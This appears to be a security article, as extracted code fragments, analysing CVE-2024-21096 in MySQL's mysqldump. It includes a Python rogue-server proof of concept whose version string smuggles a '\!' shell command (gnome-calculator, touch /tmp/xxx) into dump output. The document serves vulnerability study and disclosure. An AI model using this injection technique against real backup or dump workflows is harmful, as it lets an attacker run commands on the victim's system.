mysqldump -u username -p database_name > dumpfile.sql
mysql -u username -p database_name < /path/to/dumpfile.sql
- 通过SERVER_VERSION_LENGTH宏定义的60个字符限制版本信息的长度;
- 检查版本信息中是否存在非法字符(非字符或标点服务),如果存在则抛弃非法字符并返回版本信息。
8.0.0-injection_testn\! touch /tmp/xxx
sudo apt-get update
sudo apt-get install build-essential cmake libncurses5-dev bison libssl-dev pkg-config
wget https://dev.mysql.com/get/Downloads/MySQL-8.0/mysql-8.0.34.tar.gz
tar xzvf mysql-8.0.34.tar.gz
cd mysql-8.0.34
mkdir build
cd build
cmake .. -DDOWNLOAD_BOOST=1 -DWITH_BOOST=..
make
sudo make install
sudo /usr/local/mysql/bin/mysqld --initialize --user=mysql --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data
mysqldump -h 192.168.2.217 -urepoog -p mysql
mysqldump -h 192.168.2.217 -urepoog -p pwndb | msyql -h 192.168.2.217 -urepoog -p pwndb_imp
import logging
import asyncio
from sqlglot.executor import execute
from mysql_mimic import MysqlServer, Session
from mysql_mimic.variables import GlobalVariables
SCHEMA = {
"test": {
"x": {
"a": "INT",
}
}
}
TABLES = {
"test": {
"x": [
{"a": 1},
{"a": 2},
{"a": 3},
]
}
}
class MyVariables(GlobalVariables):
def __init__(self):
super().__init__()
self.set("version", "8.0.0-injection-testn\! gnome-calculator", True)
class MySession(Session):
def __init__(self):
super().__init__()
self.variables = MyVariables()
self._functions["VERSION"] = "8.1.1"
async def query(self, expression, sql, attrs):
result = execute(expression, schema=SCHEMA, tables=TABLES)
return result.rows, result.columns
async def schema(self):
return SCHEMA
async def main():
logging.basicConfig(level=logging.DEBUG)
server = MysqlServer(session_factory=MySession)
await server.serve_forever()
if __name__ == "__main__":
asyncio.run(main())
原文始发于微信公众号(洞源实验室):CVE-2024-21096:MySQLDump提权漏洞分析
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论